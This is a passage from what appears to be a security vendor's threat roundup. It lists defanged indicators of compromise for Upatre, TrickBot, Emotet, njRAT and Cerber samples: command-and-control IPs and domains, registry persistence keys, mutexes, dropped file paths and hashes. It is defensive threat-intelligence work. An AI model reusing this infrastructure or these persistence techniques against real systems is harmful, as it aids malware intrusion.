11185553d3e040f23efc0b0d1a9f0dc813e76cdb84174efcc785193c6d525535 149e6ff5bb2d0d3abdc7fabd4e3f6be1c563e4b57e035ee30b71a7d04c02ef8f 6fb1c35d7c0cf7f33a162c4c4eb99d6c5866880318db7781a34d9e005264985e 72c636ace54abacf4eb3e6e3a4c695e6c2c160dc6097666b249df34f46489b97 7ccdcf694abe81e19e7afc091d2b614872695e6cd9d90abab21622689bf5555d 8549f3a0383c7d65c869c0eba84960011afe71eb501eb90921066992f0b03833 9116b4c639cedb801e6b9a4891cf5af8e61a7d2f1e54390858f0f5e63dff8f42 9b3ad135a115671e8c960f353dd1805a6bbcedb2f9bf866f366bd9410a601862 e03e7f3f2d272bb18bfd138006cadf905b0fd45028327a3ec556ef1cba7c96fc e8da03e309d09fbe36a215769cf0f4b3f8b93cbf3137db0d4db77ce4bde4e534 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n* * *\n\n### Win.Dropper.Upatre-7524255-0\n\n#### Indicators of Compromise\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`91[.]211[.]17[.]201` | 28 \n`173[.]216[.]240[.]56` | 27 \n`38[.]124[.]169[.]187` | 27 \n`188[.]231[.]34[.]130` | 27 \n`176[.]108[.]102[.]76` | 27 \n`104[.]20[.]17[.]242` | 19 \n`104[.]20[.]16[.]242` | 8 \n`174[.]96[.]234[.]86` | 1 \n`69[.]77[.]155[.]3` | 1 \n`38[.]124[.]169[.]178` | 1 \n`38[.]123[.]202[.]3` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`icanhazip[.]com` | 28 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\PRTY8D97.txt` | 27 \n`%TEMP%\\prityviewer.exe` | 27 \n`%TEMP%\\scsiAFCF.log` | 1 \n`%TEMP%\\scsvii.exe` | 1 \n \n#### File Hashes\n\n` 00592846d2880dfa06ea2bb489b90c1a626bc62664e6933cbcb163cea32e1b70 006c6f0e053a633347afb8e2dc1c5f9a3c732fe654844b32c8efa7fb1b6929f7 0105ed02beac29702244d7f1f2b727d3c53e49590626773e5eefb154d626e469 0120db2a1e9c321da2c654f924c48d44f8db9c32e5cecf62f782e5fd3750ed6d 01a44cd682b97252135d9afb72061db7e8ceb87530de59b081bc13481492dbe5 01d5a8081730c45cd3c16bed3572ac37f767422435975961e783eada059f9f57 0246b510696d6e82f4ef63bd567d00fde0b1a5d8c84b5461a53003c9dbf0a507 0293c190511688dd93a031763139557febc330bb1800334e37d14d0c63ecd466 0349359919a3db6665112c77b8687ad370dfb99bd592a8af0efd7fb32e94d9c4 03b212420fccffb3f96bdb68c7952c408ea8e36d0333d8e63048f8d086a88eec 0437d8df6d2cd8b97959b30c2bf8d875ca3832c055e7f26777459f6db0ccd451 04ab31cd4de8cb6313b676c2e511e3ac477c44dcfe9cfe4a62cf77ce81b1e1a3 04f9d97774c2545c681c1463aa5abcd09355e54345bb03e7cc4105ba1ed7303c 052e7d7d29ebb25c5ab42b7262ae657e20f727c48d63f1223503e3f03daa49ad 05f64082854e6332a3ca42f5b25b8c79569f0b03b84568f26bf997efdd334eec 0607df27c26a55485cfdd78c25ca4b02ff5ebdcde2f3bd5b9265eb366e94b6a5 064cb169eae962f176d84cf3ef074871410ca3bab11bf23ce64df46e036a5b7f 0669e65c645527ae11a544a4eea34fd7d4eb7e33a73b26b6dba3399e083b36c8 07ed2f34b113fb661022915db582d15f13c3734fe6ddda2ada51464f7213f192 09239e11b17a303b9e5f02bdd6b1fcf3fdd54de6ff94b3c49bec7b3230548673 092c3f850fa506c6439ac87a9107a0b5504c0025199d7fac8961c01f873adf82 094adba281d8f8a02207f46f90d4c284ce4f1ba47f1fce53d95a068017e9c159 0970d4111acc10bf407b0babfee1c184a604e6be22318f0474afdf50b26daa33 097bea67fb8fcc721538a887ac5a4c9214489cb7c61b278b2db997c17fc51442 0b291d9eebdd2055da99fd4bc56baad1ba06d87aae0e66e7ddfe9c23953c3a29 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-tFLQHAh04jA/XiIv-alPsnI/AAAAAAAADIA/YQHu-15yj2IcIM5BU1P_Xq7WqDkfpltSwCLcBGAsYHQ/s1600/05f64082854e6332a3ca42f5b25b8c79569f0b03b84568f26bf997efdd334eec_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-_MB17XvKgAQ/XiIwDdh8QaI/AAAAAAAADIE/7YvZnFUTfFUife4Iwu915aR7Eh9iutLyACLcBGAsYHQ/s1600/67e646b44748b8bfae88076e4a1e00cf3f12b827836ff86392d63e709552f3b7_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.TrickBot-7524669-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\V1-TZEVE4 ` | 1 \n`<HKCU>\\SOFTWARE\\V1-TZEVE4 \nValue Name: exepath ` | 1 \n`<HKCU>\\SOFTWARE\\V1-TZEVE4 \nValue Name: licence ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 41 \n`Remcos_Mutex_Inj` | 1 \n`v1-TZEVE4` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`188[.]120[.]254[.]68` | 17 \n`78[.]24[.]223[.]88` | 12 \n`198[.]23[.]209[.]201` | 11 \n`185[.]177[.]59[.]163` | 11 \n`5[.]182[.]210[.]109` | 10 \n`181[.]113[.]28[.]146` | 9 \n`164[.]68[.]120[.]60` | 8 \n`185[.]213[.]20[.]246` | 7 \n`195[.]123[.]220[.]178` | 7 \n`181[.]112[.]157[.]42` | 6 \n`146[.]185[.]253[.]191` | 5 \n`5[.]2[.]70[.]145` | 5 \n`188[.]165[.]62[.]34` | 5 \n`185[.]141[.]27[.]190` | 4 \n`69[.]195[.]159[.]158` | 3 \n`181[.]129[.]104[.]139` | 3 \n`45[.]137[.]151[.]198` | 3 \n`51[.]89[.]115[.]124` | 3 \n`172[.]82[.]152[.]11` | 3 \n`172[.]217[.]9[.]243` | 2 \n`52[.]55[.]255[.]113` | 2 \n`190[.]214[.]13[.]2` | 2 \n`181[.]140[.]173[.]186` | 2 \n`45[.]125[.]1[.]34` | 2 \n`79[.]174[.]12[.]245` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`checkip[.]amazonaws[.]com` | 4 \n`wtfismyip[.]com` | 3 \n`www[.]myexternalip[.]com` | 2 \n`api[.]ip[.]sb` | 2 \n`api[.]ipify[.]org` | 2 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 1 \n`myexternalip[.]com` | 1 \n`icanhazip[.]com` | 1 \n`ipinfo[.]io` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 42 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 42 \n`%APPDATA%\\DirectTools\\data` | 31 \n`%System32%\\Tasks\\Direct Tools Update` | 31 \n`%APPDATA%\\DirectTools\\settings.ini` | 31 \n`%APPDATA%\\DirectTools` | 31 \n`%APPDATA%\\DIRECTTOOLS\\<original file name>.exe` | 31 \n`%APPDATA%\\gpuhealth` | 10 \n`%System32%\\Tasks\\Task Gpu health` | 10 \n`%APPDATA%\\gpuhealth\\data` | 10 \n`%APPDATA%\\gpuhealth\\settings.ini` | 10 \n`%APPDATA%\\GPUHEALTH\\<original file name>.exe` | 10 \n`%APPDATA%\\DirectTools\\Data\\pwgrab64` | 2 \n`%System32%\\Tasks\\shadowdev` | 1 \n`%APPDATA%\\DirectTools\\data\\pwgrab64_configs` | 1 \n`%APPDATA%\\DirectTools\\data\\pwgrab64_configs\\dpost` | 1 \n \n#### File Hashes\n\n` 0267975d981105107f8003e7a84490d0871017449352a72ecf010ee3639d99b7 0eae61f5dde95c34cf6e6a225a55c8b34ad0149b4c92c96cac7e1dd67d7423d5 1100664b904de4aaeab06a193bb1f0d6e57f0ff0407a2a836e592751ebfac142 12707680fc20d5ed8f75ee6591f81c334a096c96d6866d1ac4caa719fc55ddbc 1c63d9a293d05e5f598a169969ffd39ba0739e17740ba5205323cfa9b2a692dd 209ee235c5ae5b120a8aca752b365519aa91531ef806ed32741f7058b4c4c4fa 2b952b15f735ae3852a5b1add3dfd56b51217b073064f3cccea83b145f3e2f09 2ea8f522a5a55daafca651634e4f269f4fe7e42f222bd92f732e8c3695667c69 2eb32d3912f7e2bff7827040a76cb5b4bee6e56cec7a09b751fbc04085cf87bd 324b9688d45acf12410b42e8ce2532f5a1d077361e905c9ef69bbc812d24a01f 43de46a37c7dc56a5919babc661e2fcfcd611f1d3ff92dbdcd5a61bfeea9b79f 4ab4a600b2c75dfda7438714bc6a2cc87123b95f21372bcdcf5aa33ff73dac74 4c2fdeacf1fccac0fcdc064a5ae38065950531b7f03c2c40b5068379a591394d 4ecc86000dcc587fdf491e6589961d9523b33aa85533f61638278f8f1fd537df 539e39809bcc3ace9256394c5ce3e7626c242d4580c3a15d0a1cc5eab75b4b9f 58b8be166449de4ea71a103e65d7c45e52cc8d6bd95ac0787eecfe8dd12f980f 5cbb5ace573160c815b2e56d85e8bf5092be22887f23e28af9c6fe3fef7039ab 6f1468021e0606d3021c19630e0bd05eb721111f00c2d203efae6bf23f617a1b 75d658a651fa2fdba6930d2a6b6d2ce7491a4b87d214eb830ea3f23cd329c011 76c73a2c8f85847cb72a1ddfe56a3e728598c3a47c94cce44bd9967237039ef5 7d45d177e653e36ae3fb598b0d17acc4895795712fa53c3deb5ba4137b30e73c 7ea58adcd3598f10aa2e81557b20e52db1ef0c89071c28cdc5143af8f9ec02be 87ad53b54453925c0ced0e0f71bbbec7ba9b08afb2f827642dc55e86c0dcb8e9 8b50aa0fc83663e01ddbd06ae779ea3fdf30eaa1a63d6ad385fdca3ec17fd6cc 8b8a7b9fdb397a75cd51d720e32aebc016b2b1947478311f39929a9a43de81b9 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-nfk0oWsee6k/XiIwVfUpWCI/AAAAAAAADIQ/B8NTF6nYtY0ggcurky6zfiHmqc1TjJOYwCLcBGAsYHQ/s1600/5cbb5ace573160c815b2e56d85e8bf5092be22887f23e28af9c6fe3fef7039ab_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-vMxVZpIFnos/XiIwZo1_lsI/AAAAAAAADIU/sq109bklsWQRVTS3Vvum6S3rSu9aVTX0wCLcBGAsYHQ/s1600/5cbb5ace573160c815b2e56d85e8bf5092be22887f23e28af9c6fe3fef7039ab_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Doc.Dropper.Emotet-7540598-0\n\n#### Indicators of Compromise\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`100[.]96[.]181[.]72` | 18 \n`100[.]94[.]213[.]157` | 18 \n`100[.]74[.]125[.]242` | 18 \n`100[.]74[.]241[.]31` | 18 \n`100[.]117[.]63[.]68` | 18 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]dailygks[.]com` | 18 \n`idnpoker[.]agenbolaterbaik[.]city` | 18 \n`dobrovorot[.]su` | 18 \n`casiroresources[.]com` | 18 \n`isague[.]com` | 18 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\126.exe` | 18 \n`%TEMP%\\CVRE39.tmp` | 1 \n \n#### File Hashes\n\n` 0e42ea2ebecf3779a9341c0375c8b71f60a88801b3a717d8fe5dec4a2bbee37c 2853b45864dd97b3be97f9acfcc6be83c6024d9b4e5b48d6b56a8c622e106b5e 2c2254c79ef6d0fc9a3c4bb9b865a2694ba00b791042f6f806dc8ae48ff07fa3 35a6c928ace899581d72bbb94aecb90fc54a9ef85b852a12cc77ec1a7fd4a239 3cec47fd33c8debe5e4cee8126ce9d3c977ae39d9baf454f86dd73ba82a87076 3e73a141bcf5c7a18d8fdc94f34102c1e765c5b0f37ff11c1d122463c4629d38 5a0ddb6c22ebb84af02651396e07204801bee4889965dc943cf6e16035771b87 617c999b2244b6e1a787a80a64f8818ae99a0bbd3c5603f95bdc6682c399a1c1 66974cd3270a8bf0aa4af9105ce84960ae7c7425b120b0045624f2615dbcf842 67812a5d87377778d7c2586585d30d7ab4ab6c2c9334844004c12badd5b72eba 71c8341327d3285f1f3c7ad62fdc102fd6a662c68a2f3a98eac7d0d9f5d6ea7b 92ad35b60997f88c37b57dc1fbb525217375289fab05ea7ba5d6c67ed1d00edf 947dd402232ac165d5c9286e67996e725bfe0c530f969aacea44e7979676fb45 aeed3ac02a448f72ef07047693ee9292d68a54049923a1ec4a53694d517cf048 b29038b3debfd28466ba4ea6e626143187bcd998bf442048a56f4737eb0d85fd d1a0bf24f3c653cd6c7f75b8c51c92cec21fc74d04ce8749bf68a5ad7e40b151 d2be052e9a55cc6eada8d74f6b5c614584588797ee7107e17b2811fb47e3d724 eff598d5a0c0ecaa0d8243173520ef331e71fb60c33b94d24932219c9e27abb9 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-04TG3bF-RfI/XiIwmtBmWTI/AAAAAAAADIc/2UsbzDv2yl8QP2mHRBol8-zFlE-ThTLuQCLcBGAsYHQ/s1600/3e73a141bcf5c7a18d8fdc94f34102c1e765c5b0f37ff11c1d122463c4629d38_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-m30S64kTdas/XiIwpCvCPFI/AAAAAAAADIg/wQGmRCS1Pf8IRzRt-5Lbcc-WDjUvYILQwCLcBGAsYHQ/s1600/3e73a141bcf5c7a18d8fdc94f34102c1e765c5b0f37ff11c1d122463c4629d38_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-5rUB6N5REL8/XiIwthO7gSI/AAAAAAAADIo/tOVHV4ZSTu0vB8fw5jNYg_pEi6kDvepiACLcBGAsYHQ/s1600/aeed3ac02a448f72ef07047693ee9292d68a54049923a1ec4a53694d517cf048_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.njRAT-7532636-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\S-1-5-21-2580483871-590521980-3826313501-500 \nValue Name: di ` | 22 \n`<HKCU>\\ENVIRONMENT \nValue Name: SEE_MASK_NOZONECHECKS ` | 22 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: ParseAutoexec ` | 22 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 9b900e9e6a204ac0d795c328b297a541 ` | 1 \n`<HKCU>\\SOFTWARE\\9B900E9E6A204AC0D795C328B297A541 \nValue Name: [kl] ` | 1 \n`<HKCU>\\SOFTWARE\\3E80006ED1A558F4A4E8C67B4482A653 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 3e80006ed1a558f4a4e8c67b4482a653 ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 3e80006ed1a558f4a4e8c67b4482a653 ` | 1 \n`<HKCU>\\SOFTWARE\\3E80006ED1A558F4A4E8C67B4482A653 \nValue Name: [kl] ` | 1 \n`<HKCU>\\SOFTWARE\\BAC5BD34B5EC131B955ED0D6686691C0 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: bac5bd34b5ec131b955ed0d6686691c0 ` | 1 \n`<HKCU>\\SOFTWARE\\8B9C85CEA1B5BC95470D5B663265ABBA ` | 1 \n`<HKCU>\\SOFTWARE\\EE265A490F50F82D7DA78B5AFC5D4BF1 ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: bac5bd34b5ec131b955ed0d6686691c0 ` | 1 \n`<HKCU>\\SOFTWARE\\BAC5BD34B5EC131B955ED0D6686691C0 \nValue Name: [kl] ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8b9c85cea1b5bc95470d5b663265abba ` | 1 \n`<HKCU>\\SOFTWARE\\EE265A490F50F82D7DA78B5AFC5D4BF1 \nValue Name: [kl] ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8b9c85cea1b5bc95470d5b663265abba ` | 1 \n`<HKCU>\\SOFTWARE\\8B9C85CEA1B5BC95470D5B663265ABBA \nValue Name: [kl] ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: driver ` | 1 \n`<HKCU>\\SOFTWARE\\1BB40C47BEAE292B8957771D185E2963 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 1bb40c47beae292b8957771d185e2963 ` | 1 \n`<HKCU>\\SOFTWARE\\E44B3D2D77E82BFAA8FBE232C3FAC08B ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 1bb40c47beae292b8957771d185e2963 ` | 1 \n`<HKCU>\\SOFTWARE\\1BB40C47BEAE292B8957771D185E2963 \nValue Name: [kl] ` | 1 \nMutexes | Occurrences \n---|--- \n`<32 random hex characters>` | 22 \n`Random` | 3 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`46[.]246[.]13[.]73` | 1 \n`41[.]97[.]3[.]243` | 1 \n`41[.]102[.]190[.]225` | 1 \n`91[.]109[.]176[.]6` | 1 \n`84[.]236[.]13[.]94` | 1 \n`41[.]226[.]95[.]248` | 1 \n`197[.]167[.]16[.]253` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`cadastroseguro2016[.]ddns[.]net` | 3 \n`kounan-19[.]no-ip[.]org` | 1 \n`sasbab[.]ddns[.]net` | 1 \n`pubguk[.]linkpc[.]net` | 1 \n`najor123[.]ddns[.]net` | 1 \n`neonka99[.]ddns[.]net` | 1 \n`no` | 1 \n`skyfall2017[.]ddns[.]net` | 1 \n`service-updater[.]hopto[.]org` | 1 \n`eslam[.]no-ip[.]org` | 1 \n`tigano0724[.]myq-see[.]com` | 1 \n`ghostprocess[.]no-ip[.]info` | 1 \n`taki[.]ddns[.]net` | 1 \n`crazyevil3[.]ddns[.]net` | 1 \n`systemo32[.]publicvm[.]com` | 1 \n`rooowl1999[.]no-ip[.]biz` | 1 \n`kamel23[.]noip[.]me` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\svchost.exe` | 4 \n`%TEMP%\\server.exe` | 4 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 4 \n`%APPDATA%\\server.exe` | 2 \n`%APPDATA%\\svhost.exe` | 1 \n`%HOMEPATH%\\server.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\16d577f1045ea00e0472332fe1885e1f.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\2eed382eb0cd52422d5fda835a5d88b5.exe` | 1 \n`%TEMP%\\pc.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\df76fe148f41309232d46b5526143610.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\8d580f86972cdfde2bbd41845bc851f9.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\32814b0ea96b317a805dd9174ee7c5c4.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ee28203cdc477e7ad13344342ffe1e0b.exe` | 1 \n`%TEMP%\\Internet Explorer.exe` | 1 \n`%APPDATA%\\winziy.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\9b900e9e6a204ac0d795c328b297a541.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\3e80006ed1a558f4a4e8c67b4482a653.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\8b9c85cea1b5bc95470d5b663265abba.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\driver.url` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\driver.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1bb40c47beae292b8957771d185e2963.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\e44b3d2d77e82bfaa8fbe232c3fac08b.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\c4d9b868e64e2ec7e7f1e04c6e64ac91.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\213668f5f21ad17f1b3d939134e17f24.exe` | 1 \n`%APPDATA%\\winx.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0462bc4b60370728471971b9326c2e1540370809292ffd6cb5791a61df705bf9 0b331c29e38da9fe5fe00f40e2af43a4ac960ce48539b34e6d506c3b54a49920 162616259b6591503807bda2b9228c88409f4a71c085bc4b39d5eef2b64213c9 1846cfe96f4733d9cc7620cff603abdf1c44fe2f84d34daa79c14b04a726357d 21f09de33d10673fb5f8c2f1cf5924f5b81019e037a44b7f151da61b84c85b0d 275e4d554f63db96a64bbca5f0b30ab96199c8595ea0c3c2d46a413f30387a2f 2b140d53ec1d99cc07662d85f14bae2a4e6cfea3b7d66da0b31be4ecd641bae1 2c55658cf368c0f4f16b9f142e6ee6adb91362c79eb5ecab77d93852b35b7599 3022c3729827f0f7ea739b18b073e6c488ce6481eedaae147cc33738401d131e 339e7b601f00ee4b80af2645e1e39a8b71901d328d1c56e4f42e7ba74f16b618 3d8b6537791fe4f05043a40cc0cff83fb5ae54396c40fded6daae018a7a03c0e 437d2adb9946aeb1e630619e4aa571149d2adedeea8f6d0c39c1bed21c4063cb 459304f70aa2e992bdaed0915ec96cda9c99c6edde30698197319f8fa40a4024 461ec9be4e72154e7faebde91b452dbf0c22281405f0966eeddf69330f91ad2d 51e865bd11fd5daff52c74c0072c6e713535d4a90d5b1398b78c806be1a59dc9 53b7c2eadbb2686d6bcfed439d656df597b396f0004b086a9aad6806e7810256 63779c53cc4ab5d02daadffdd2f7b93b3bfc1a137eb1e5a895d7e2b8393f42a5 6b1bbec6381d6c95ef40d1ddb1ffbc015777d30686d9ba4353857f35b5947e15 6e178460a0f54a86e71df31ac2e90ffbaaf00a41ce9722257613f33ed9acc892 79d129fd698fbf62084545a105e6bd3cc027435a42ae3eb48c3e62c6e2ec461e 80aab48e04978ab54b4a50bba68286d1f03af19b27e78e8263b360d10c7f5904 84bddfdc96745d0be34f31be3b7e4160db6e04fa7d7648ebf03b81807841bffb 86da48f0943d29d940c8ea86a26695026e0a3b5ff74c08cd1189d84e05a57d97 8789bba00344fcb155e891679121b770a4daabe0171a78fccbef5b92322f4105 8ac101bcbb0a30f23ff1f7fb341a3daaa7ff13f045c0e812ac9f6c5079ef82af `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-vCCx56X9Gbs/XiIw8gJ-GAI/AAAAAAAADI0/1ag2zEuHoNE5YN4coSXJqOtdlzRuakStQCLcBGAsYHQ/s1600/21f09de33d10673fb5f8c2f1cf5924f5b81019e037a44b7f151da61b84c85b0d_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-dtUO5Nu3rpI/XiIxA8SG6PI/AAAAAAAADI8/YH-lnvycAV8Ej-OI9sBxmRoQukAxCYdBQCLcBGAsYHQ/s1600/ec56a0a4ba7d45994dd8a6757dc1eb730228ca5ce23380085f501a50ba8ae7b3_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Cerber-7533438-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: SuperHidden ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: Run ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\COMMAND PROCESSOR \nValue Name: AutoRun ` | 25 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: SCRNSAVE.EXE ` | 25 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} ` | 25 \n`<HKCU>\\PRINTERS\\DEFAULTS ` | 25 \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\16000009 \nValue Name: Element ` | 24 \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\250000E0 \nValue Name: Element ` | 23 \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\250000E0 ` | 23 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fsutil ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: fsutil ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: logman ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: logman ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: rasautou ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: EhStorAuthn ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: EhStorAuthn ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ntoskrnl ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: ntoskrnl ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: eventcreate ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: eventcreate ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: isoburn ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: isoburn ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: hh ` | 1 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 24 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`31[.]184[.]234[.]0/25` | 25 \n`208[.]95[.]112[.]1` | 25 \n`69[.]195[.]146[.]130` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences 